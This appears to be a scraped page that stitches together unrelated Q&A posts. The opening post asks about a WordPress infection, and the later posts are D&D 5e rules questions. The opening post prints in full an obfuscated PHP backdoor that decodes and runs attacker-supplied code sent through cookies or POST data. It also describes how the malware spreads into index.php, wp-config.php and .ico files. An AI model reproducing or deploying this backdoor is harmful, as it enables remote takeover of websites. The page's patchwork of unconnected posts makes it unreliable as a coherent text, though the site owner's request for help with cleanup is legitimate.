What’s the effect if this malware if infected your WP?

Just curious here and I need better understanding about this malware. Because their are websites are infected by this malware including my websites. But I can clean them all. Usually this malware written in strange name in .php file, inside this file:

<?php $  hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$  yiorkoj = Array();$  yiorkoj[] = $  hsexdir[11].$  hsexdir[15].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31].$  hsexdir[28].$  hsexdir[17].$  hsexdir[16].$  hsexdir[20].$  hsexdir[29].$  hsexdir[11].$  hsexdir[31].$  hsexdir[2].$  hsexdir[21].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[7].$  hsexdir[22];$  yiorkoj[] = $  hsexdir[24].$  hsexdir[27].$  hsexdir[11].$  hsexdir[6].$  hsexdir[13].$  hsexdir[13].$  hsexdir[8].$  hsexdir[24].$  hsexdir[23].$  hsexdir[3].$  hsexdir[27].$  hsexdir[24].$  hsexdir[24].$  hsexdir[23].$  hsexdir[6].$  hsexdir[16].$  hsexdir[12].$  hsexdir[24].$  hsexdir[23].$  hsexdir[13].$  hsexdir[33].$  hsexdir[11].$  hsexdir[27].$  hsexdir[23].$  hsexdir[28].$  hsexdir[28].$  hsexdir[24].$  hsexdir[8].$  hsexdir[9].$  hsexdir[27].$  hsexdir[11].$  hsexdir[30].$  hsexdir[13].$  hsexdir[27].$  hsexdir[11].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[25];$  yiorkoj[] = $  hsexdir[11].$  hsexdir[21].$  hsexdir[20].$  hsexdir[29].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[17].$  hsexdir[15].$  hsexdir[28].$  hsexdir[0].$  hsexdir[28].$  hsexdir[13].$  hsexdir[31];$  yiorkoj[] = $  hsexdir[28].$  hsexdir[18].$  hsexdir[0].$  hsexdir[5].$  hsexdir[21].$  hsexdir[27].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[20].$  hsexdir[12].$  hsexdir[19].$  hsexdir[31].$  hsexdir[15];$  yiorkoj[] = $  hsexdir[13].$  hsexdir[15].$  hsexdir[15].$  hsexdir[13].$  hsexdir[14].$  hsexdir[17].$  hsexdir[1].$  hsexdir[28].$  hsexdir[15].$  hsexdir[10].$  hsexdir[28];$  yiorkoj[] = $  hsexdir[19].$  hsexdir[31].$  hsexdir[15].$  hsexdir[5].$  hsexdir[28].$  hsexdir[29];$  yiorkoj[] = $  hsexdir[0].$  hsexdir[13].$  hsexdir[11].$  hsexdir[4];foreach ($  yiorkoj[8]($  _COOKIE, $  _POST) as $  sgmcz => $  tfbhhc){function ouvcux($  yiorkoj, $  sgmcz, $  lcrwjj){return $  yiorkoj[7]($  yiorkoj[5]($  sgmcz . $  yiorkoj[2], ($  lcrwjj / $  yiorkoj[9]($  sgmcz)) + 1), 0, $  lcrwjj);}function jnlge($  yiorkoj, $  ysittw){return @$  yiorkoj[10]($  yiorkoj[1], $  ysittw);}function njfgaru($  yiorkoj, $  ysittw){$  epjvwf = $  yiorkoj[4]($  ysittw) % 3;if (!$  epjvwf) {$  oqkbtbd = $  yiorkoj[0]; $  qyzju = $  oqkbtbd("", $  ysittw[1]($  ysittw[2]));$  qyzju();exit();}}$  tfbhhc = jnlge($  yiorkoj, $  tfbhhc);njfgaru($  yiorkoj, $  yiorkoj[6]($  yiorkoj[3], $  tfbhhc ^ ouvcux($  yiorkoj, $  sgmcz, $  yiorkoj[9]($  tfbhhc))));} 

and that malware creates many index.php files in folders and also this malware adds code in index.php (real one), wp-config.php, and wp-setting.php. This malware changes the file permission of those infected files to 0755. Inside of this index.php (original and fake) and those original WP files there is an encrypted code of the destination directories to the other malware with .ico (extension) or favicon file.

May be expert can explain more.

Does a caster under the effect of a True Polymorph spell retain their class levels?

The true polymorph spell specifies that:

The target’s game statistics, including mental ability scores, are replaced by the statistics of its new form … The creature is limited in the actions it can perform by the nature of its new form, and it can’t speak, cast spells, or take any other action that requires hands or speech, unless its new form is capable of such actions.

So let’s take the example of a level 20 Sorcerer who has permanently True Polymorphed himself into a Planetar Angel.

The sorcerer’s game statistics are replaced by those of the new form. Does this include class levels? The angel’s form doesn’t limit the physical ability to use spellcasting, but does the sorcerer retain their class-given spellcasting ability?

The wording of the spell seems to imply the caster is still able to cast their spells, as long as the new form is physically capable of performing the required components.

How about a dragon? They are capable of verbal and somatic components, which are the only requirements for spell usage.

What part of a multi-type damage roll is reduced by a non-type-specific effect?

Effects like Cutting Words (PHB, p. 54) and Spirit Shield (XGtE, p. 10) reduce damage by a roll, irrespective of damage type (PHB 196). However, single damage rolls can have multiple damage types, as confirmed (for wording) by Jeremy Crawford in this tweet.

How do you know which part of the damage is reduced?

This could actually make a difference to the amount of damage taken if, for example, the creature taking damage is resistant to one or more of the damage types involved.

Cutting Words: … When a creature that you can see within 60 feet of you makes an attack roll, an ability check, or a damage roll, you can use your reaction to expend one of your uses of Bardic Inspiration, rolling a Bardic Inspiration die and subtracting the number rolled from the creature’s roll.

Using this ability to expand upon the examples found in this related question and this other related answer:

Barny, an Ice Devil (MM, p. 75) hits Bobby, rolling 9 slashing damage and 11 cold damage.

Bobby’s ally, Vera, is a level 10 bard of the college of Lore, and uses her Cutting Words ability on the attack’s damage roll. She rolls a 9, which is subtracted from the Barny’s damage roll.

Bobby is wearing his Boots of the Winterlands (DMG, p. 156), giving him resistance to cold.

We know that “resistance and then vulnerability are applied after all other modifiers to damage” (PHB, p. 197) and both slashing damage and cold damage are treated as “one big damage roll” (see the JC tweet), so is all the 9 slashing damage removed by cutting words, and then the cold damage halved for 5 total damage, or is 9 of the cold damage removed by cutting words, leaving 2 to be halved for a total of 1 + 9 = 10 damage taken by Bobby?

Who makes this decision?

When an effect (like cutting words) reduces damage without specifying type from a source containing multiple damage types, what part of the damage is reduced?

Does Dim Light created by an effect override Bright Light in an area?

Two examples.

A silvery beam of pale light shines down in a 5-foot-radius, 40-foot-high cylinder centered on a point within range. Until the spell ends, dim light fills the cylinder.

Moonbeam, Player’s Handbook, pg. 261

You create up to four torch-sized lights within range, […] each light sheds dim light in a 10-foot radius.

Dancing Lights, Player’s Handbook, pg. 230

Now consider that each of these spells are cast on a bright day, obviously covered by Bright Light, as the game understands it.

  1. Do these spells change the Bright Light within the area affected by them into Dim Light?
  2. Is the behavior different between Moonbeam (“Dim Light fills the cylinder”) and Dancing Lights (“each light sheds dim light”), or do both of them behave the same?

Does the “damage for disobedience” effect from geas end when the caster dies? [duplicate]

This question already has an answer here:

  • Do your spells end when you die? 1 answer

I have a situation where some NPCs were under the influence of the geas spell by a pair of Lamia. They commanded the NPCs to rebuild some buildings in a town to furhter the Lamias’ evil goals and to protect the Lamias. As a DM, I had set the clock at day 9 out of 30 when the PCs showed up.

Geas / Duration: 30 days
You place a magical command on a creature that you can see within range, forcing it to carry out some service or refrain from some action or course of activity as you decide. {snip} While the creature is charmed by you, it takes 5d10 psychic damage each time it acts in a manner directly counter to your instructions, but no more than once each day. {snip} You can end the spell early by using an action to dismiss it. A remove curse, greater restoration, or wish spell also ends it.

I also have, as part of the background, a set of graves of NPCs who tried to flee and died from 5d10 for not obeying the Lamia’s command under geas. (They can each cast it once per day, so can build up a small work force rather quickly). The survivor is aware of “if you disobey the Lamia, you die” problem.

The party slew the Lamias in a battle (despite a lot of misses due to mirror image on the Lamia) and also slew some of those who were under its effects.

But one of them survived, with 1 HP. The party also knocked out five other NPC’s who will recover soon. The rest of the NPCs protection the Lamia died during the battle. I do not think that being knocked out ends the geas: it’s not a wish, remove curse, or greater restoration.

If the party offers to take the NPCs away from the town and return him to his kinfolk, and the NPC goes with the party but does not first complete the task of rebuilding the buildings in the town, does the NPC take 5d10 damage?

Geas does not require concentration; I am unsure if the death of whomever cast the geas on a creature ends the spell, or if the compulsion continues until the spell’s duration runs out regardless of whether the caster is alive or dead. I suspect it’s the latter.

What are the Effects of “Maximizing” Damage on an Effect?

In 5th Edition D&D, there’s a few circumstances where a character’s damage might be “maximized”.

For example, the Evocation Wizard’s Overchannel ability:

Starting at 14th level, you can increase the power of your simpler spells. When you cast a wizard spell of 1st through 5th-level that deals damage, you can deal maximum damage with that spell.

Overchannel, Player’s Handbook, pg. 118

Or an entry on the Wild Surge table:

33-34     Maximize the damage of the next damaging spell you cast within the next minute.

Wild Magic Surge, Player’s Handbook, pg. 104

The way I see this, there’s two valid ways to treat this effect:

  1. Treat the damage dice as though each die rolled its respective maximum value
  2. Treat the damage as though it is the sum of the maximum values that each possible die could have rolled

These two effects might seem similar, and in most situations they are, but there’s a few circumstances where they might be different. For example, for an Attack-Roll based spell, the damage of interpretation 1 is doubled on a crit, because you’re doubling the quantity of dice that are being used to calculate damage; but under interpretation 2, it would not be, because critical hits do not double flat damage modifiers, and taking the maximum value of all the rolled dice would turn it into a flat modifier.

Conversely, there are spells which depend on a specific value rolled on the damage dice to change its behavior, like with Chaos Bolt:

You hurl an undulating, warbling mass of chaotic energy at one creature in range. Make a ranged spell attack against the target. On a hit, the target takes 2d8 + 1d6 damage. Choose one of the d8s. The number rolled on that die determines the attack’s damage type, as shown below.

If you roll the same number on both d8s, the chaotic energy leaps from the target to a different creature of your choice within 30 feet of it. Make a new attack roll against the new target, and make a new damage roll, which could cause the chaotic energy to leap again.

Chaos Bolt, Xanathar’s Guide to Everything, pg. 151

Under interpretation 1, the Chaos Bolt always deals Thunder damage, and always leaps to a new target on a successful hit, because each of the d8s are being treated as having each rolled 8. Under interpretation 2, however, the d8s are rolled, and then ignored for the purpose of calculating the total damage, because the damage is simply being set to the maximum possible value of 22, without setting the values of the individual dice.

So which is it? Is there rules support to show that Maximizing Damage should be handled one way or the other?

Additionally, since I’ve raised the spectre of an attack-roll based spell like Chaos Bolt, the issue of the Attack Roll itself also needs to be raised: should the Attack Roll be treated as an Automatic hit (or crit!) because failing to do so will result in the spell dealing less than maximum damage? Or is “Maximizing” damage meant to only mean damage after a successful attack roll, which therefore means the attack roll cannot be overridden?

Readying an Item effect

Can a player hold the effect or spell granted to them by an item, and if so, does the spell or effect follow the normal “Readying spell” rule where if the trigger never occurs, the effect or the spell, or the charges on the item are wasted.

IE: “I hold the effect of my Cape of the Montebank (dimension door) until the minotaur moves into melee with me.”

The minotaur never moves into melee with said character.

How can I replicate this effect of the Infinity Gauntlet using official material?

I am a GM searching for some means (spell, magic item, artifact, etc) of replicating the power granted by the notorious Infinity Gauntlet as depicted in Marvel’s Cinematic Universe. The effect I’m searching for in the game I am going to run as GM isn’t “demicide” but is (if anyone recognizes my name and will be in my game spoiler below):

The 9th Level Spell Wish does not seem to suffice due to this clause in the rules for Wish:

You might be able to achieve something beyond the scope of the above examples. State your wish to the DM as precisely as possible. The DM has great latitude in ruling what occurs in such an instance; the greater the wish, the greater the likelihood that something goes wrong.

Emphasis added.

I’m looking for something reliable, not a monkey paw that Wish seems to function as when anyone attempts to use it for effects of this scope.

Something that ties into established D&D lore rather than “oh yeah, it’s like the movie, but in D&D”.

If there is nothing even remotely like the Infinity Gauntlet in any official D&D 5e material, or Unearthed Arcana, then are there any official rules or guidelines on expanding the scope of a spell like Disintegrate to target massively large numbers of targets? I could extrapolate from there.

CLARIFICATION: it doesn’t have to have “collect sub-components” as the Infinity Gauntlet needed Infinity Stones to be collected from all over the universe. The important part is if there is already anything or anyone in DnD5e official that has such power.

Is the gaze effect of a medusa blocked by an antimagic field?

This question addresses the question of whether petrification effects are blocked by the Antimagic Field spell. But it does not seem to address the gaze itself – particularly of a medusa.

A beholder’s ray is clearly blocked as a magical beam – but what about the gaze of a medusa. Is the gaze of a medusa magical or non-magical? Alternatively, if not the gaze itself, what about the effect of the gaze. Is the effect of the gaze considered magical and blocked by an anti-magic field?